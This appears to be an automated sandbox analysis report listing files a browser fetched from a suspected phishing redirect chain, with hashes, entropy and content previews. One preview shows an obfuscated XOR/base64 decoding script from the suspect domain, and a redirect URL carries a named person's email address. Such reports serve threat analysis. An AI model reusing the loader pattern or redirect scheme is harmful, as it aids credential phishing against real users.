                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):35748
                                                          Entropy (8bit):5.056772709760769
                                                          Encrypted:false
                                                          SSDEEP:192:hEoogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjfuogr:hhDKAaZtJs5odwuhx5P6mqjDggJkLLn
                                                          MD5:94C952E68CD89B529170B6B82C994BBE
                                                          SHA1:822F28855D88DA679AF6E8A437316D72433965D4
                                                          SHA-256:5A55CE5E458408B483A2B08C45444E987124FD0857D68F12C9A2EAE76BB8A8C4
                                                          SHA-512:EF59FD62B3E33A20A78157A620BB05A463138CF92EFE597E70D3F9EDAAB499FA9B72CF2E29DCEF9ED7C7D7764E42111B690D30A7328D2FA9760F40BEF1E10548
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          URL:https://kpl2.r04ar2.com/xy7B16Rpqjcafef30
                                                          Preview:#sections_godaddy {..font-family: gdsherpa;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {.. color: var(--ux-1j87vvn,#fff);.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap: .5em;.. displa
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):2905
                                                          Entropy (8bit):3.962263100945339
                                                          Encrypted:false
                                                          SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                          MD5:FE87496CC7A44412F7893A72099C120A
                                                          SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                          SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                          SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):113268
                                                          Entropy (8bit):5.796464319191573
                                                          Encrypted:false
                                                          SSDEEP:3072:sn9dRkD0zt5VjqWbZyboC2efA7eT1XZefH57JDpmwYNtB:snNY0Frcg5FiNtB
                                                          MD5:F7D0CCA2EA2B9B3853E6E45AF072B628
                                                          SHA1:754EE6031455FA14C1D43D083C975EAAD721BC0C
                                                          SHA-256:6C6C99C0E8B135AB8E7353E741F7F1113F691D0855FA6B5D24F4134DEA127EFB
                                                          SHA-512:4FE6839398E2900A76AB28FAD2E1E8C7B923C12174BF3B36E67D1A877B32CFEEF872A1989B91D22AD9764BBCE59A6A15F224227FD1C7F4C8F99DA9BB902C45B2
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Preview:<script>..function bZdvGuIDqN(trSVXhFkYM, IUXFXwjnYw) {..let aNTHaIpWNx = '';..trSVXhFkYM = atob(trSVXhFkYM);..let BoAUQLMMlZ = IUXFXwjnYw.length;..for (let i = 0; i < trSVXhFkYM.length; i++) {.. aNTHaIpWNx += String.fromCharCode(trSVXhFkYM.charCodeAt(i) ^ IUXFXwjnYw.charCodeAt(i % BoAUQLMMlZ));..}..return aNTHaIpWNx;..}..var oyMVcmtwpD = bZdvGuIDqN(`C1QsGQVmETocdF8BBTp4P0JWMSBaGUg6J1wvV3sxWVdWW0wOIA84MAl4YnZmEmhWKjdFHBgiZkE6CWR2XwEcJjUIZ0U6O1MQRjw3Ry0YIHpUGgV5LEM9DystGkZGYGgCZgcwOhkfG3R4DmcZOiZeBRxoSzhoSnl0CwYLJC9CPEoqJlRISj4yRjgZY3sYFgw4aEEnCTIxQ1sBOWkGZlx3ZBgGBzUtVzxEMDsZGAE4aFg7SGdoGAYLJC9CPFRUXhdVSHZ6QSsYMCRDVRskJQ9qAi0gRwZSeWlVIR4xIVVbCzkrHS4PNyAYBwk4IlcwGnc+RFoaMypXKRk8JxgRByEoXicLPXtBRUZiaAFnGDg6UxAQJmhfIQR3PkRXVmppQSsYMCRDS2VcZhJoSmUnVAcBJjISOxg6aRUdHCI2QXJFdjdTGwIlaFEkBSwwURkJJCMcKwU0e1YfCS5pXiEIKntUBxEmMl1lACp7A1tZeHcdKxggJEMaRTw1HCUDN3pdBkpoeh07CSs9RwFWW0wSaEp5aEQWGj82RmgZKzcKVwAiMkI7UHZ7QAIfeCFdJw01MRkWBztpQC0JOCRDFgA3aVM4A3c+RFdWamlBKxgwJENLZVxmEmhKZTheGwN2NFckV3snQwwE
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):550538
                                                          Entropy (8bit):5.675557514253788
                                                          Encrypted:false
                                                          SSDEEP:6144:P0+gkOqQJ3Y4CW9vgZN6che5AGLNJxXG5DIFAvw0Wimqf9gkhnZIbfhn7/bBRyTE:cbWScytNHQgAvVfKczC
                                                          MD5:70306D36CE9DBCBD8E5D1C9913A5210F
                                                          SHA1:04949AD636F8CD09BF91059BC4AAF1973C92A15F
                                                          SHA-256:1425B3DC4E809E5488AAE10E2EB2511F652C6A9C3845C98C3FE69F07FE0C9E2B
                                                          SHA-512:A7F00BA83FEE80E7F2006C9E1F0121E2E515F4956182924E67C95A8C5522F30735F7BF4A6F7DCF3CBD29A685E967B1C4DDFD72D7F1F4CEFBE55326BECDACB275
                                                          Malicious:false
                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var w=function(){return[function(n,T,M,A,E,x,a,U){return((n|1)&((n|(n+8>>(((U=["C",17,"F"],n+6)^8)>=n&&(n+3^8)<n&&(M[U[0]]&&M[U[0]][U[2]]&&(E=M[U[0]][U[2]],x=M.u,x in E&&delete E[x],l[45](50,T,M[U[0]][U[2]],A,M)),M.u=A),4)||(a=HT(M[U[2]],function(W){return typeof W[T]==="function"})),32))==n&&(a=M.u||(M.u=T+(M.VR.G5++).toString(36))),16))<5&&(n^5)>=U[1]&&(a=M!=null&&M.sg===T),a},function(n,T,M,A,E,x,a,U){return(n&(((n|24)==(U=["getValue",43,null],n)&&X.call(this,T),n&52)==n&&(E=H[49](31,M),E!=U[2]&&.E!=U[2]&&(B[19](73,T,0,A),l[3](6,128,T.L,E))),(n<<2&15)>=4&&n+3<22&&T.keyCode==13&&this.L[U[0]]().length==6&&(this.A
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:dropped
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):49602
                                                          Entropy (8bit):7.881935507115631
                                                          Encrypted:false
                                                          SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                          MD5:DB783743CD246FF4D77F4A3694285989
                                                          SHA1:B9466716904457641B7831868B47162D8D378D41
                                                          SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                          SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                          Malicious:false
                                                          Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):128
                                                          Entropy (8bit):4.750616928608237
                                                          Encrypted:false
                                                          SSDEEP:3:CaSbcCq9EKVEkxhZJSh3EkEkkcJSh3EkEkki3kx+BR0:PSbzqyKVEkxzQ7QDw+R0
                                                          MD5:D90F02F133E7B82AF89B3E58526AC459
                                                          SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                          SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                          SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                          Malicious:false
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwni42cVMl80OhIFDV9X_g0SBQ0TmyRjEkEJxaTHdoxRZ6USBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                                          Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                          Category:downloaded
                                                          Size (bytes):28584
                                                          Entropy (8bit):7.992563951996154
                                                          Encrypted:true
                                                          SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                          MD5:17081510F3A6F2F619EC8C6F244523C7
                                                          SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                          SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                          SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/90BLxVXhpRTD45c1Cvst53
                                                          Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10017)
                                                          Category:downloaded
                                                          Size (bytes):10245
                                                          Entropy (8bit):5.437589264532084
                                                          Encrypted:false
                                                          SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                          MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                          SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                          SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                          SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                          Malicious:false
                                                          URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240827T221107Z&X-Amz-Expires=300&X-Amz-Signature=af9a21034bb5e7fe65ef996d782a724b97119aa5e47467ec39a4e165ad0b1acb&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                          Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65451)
                                                          Category:downloaded
                                                          Size (bytes):89476
                                                          Entropy (8bit):5.2896589255084425
                                                          Encrypted:false
                                                          SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                          MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                          SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                          SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                          SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                          Malicious:false
                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
                                                          Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (45034)
                                                          Category:downloaded
                                                          Size (bytes):45035
                                                          Entropy (8bit):5.400557193761079
                                                          Encrypted:false
                                                          SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                          MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                          SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                          SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                          SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                          Malicious:false
                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js
                                                          Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):582
                                                          Entropy (8bit):5.186368861331765
                                                          Encrypted:false
                                                          SSDEEP:12:hYzx7BqhCffmMQ7ctQtqqJmrLgF/fBgMU+4Nbx8oA2/fmMXhfmMl:hYzxBqhCWP42RRi9+4NBA22WUq
                                                          MD5:D1D553B297EB4AD5253CBFBD0D36118E
                                                          SHA1:12D19C210A60CDD945FF0B6B3A411ADA65518C69
                                                          SHA-256:DBB566525226F6268A2FAA76B40B9BF2CE8ED486AD19F44696412FD8755440FA
                                                          SHA-512:99090A049CFEEC00DFA8F2F67EB4C9A43D7567D16DA31E5D923BF64EC2FC773E44CE7AC25B5AA8B7ABF55B9570144CB2643C72B1EF6CA065F4A30065422A944F
                                                          Malicious:false
                                                          URL:https://href.li/?https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au
                                                          Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/KPL2.r04ar2.com\/KPL2\/?em=natasha.hammond@lchs.com.au" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au">https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond@lchs.com.au</a></p></body></html>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (45034)
                                                          Category:dropped
                                                          Size (bytes):45035
                                                          Entropy (8bit):5.400557193761079
                                                          Encrypted:false
                                                          SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                          MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                          SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                          SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                          SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                          Malicious:false
                                                          Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 86 x 73, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):61
                                                          Entropy (8bit):4.014960565232003
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPlxiNR0kxl/k4E08up:6v/lhPuQk7Tp
                                                          MD5:66F395DDE20DA7B6FBA5F1F2D62F9461
                                                          SHA1:AA5C21902D0CF6D5E6B78959094B34931DA2CDC1
                                                          SHA-256:B11A15B13B2E2764881D01331D65E1452369FBE967751495200A8D9669852EC2
                                                          SHA-512:36671550546B7D950114725A26982E944698EDB1015EDD611455C31EA5FFB512AF5EC10D4F664D36BAFD271B6B227E0412972DF219584BE537B6B34D7E3F3948
                                                          Malicious:false
                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b9f6497ee820fa4/1724796641795/JJoPtCsZIVs8EyO
                                                          Preview:.PNG........IHDR...V...I.....(.F.....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:downloaded
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
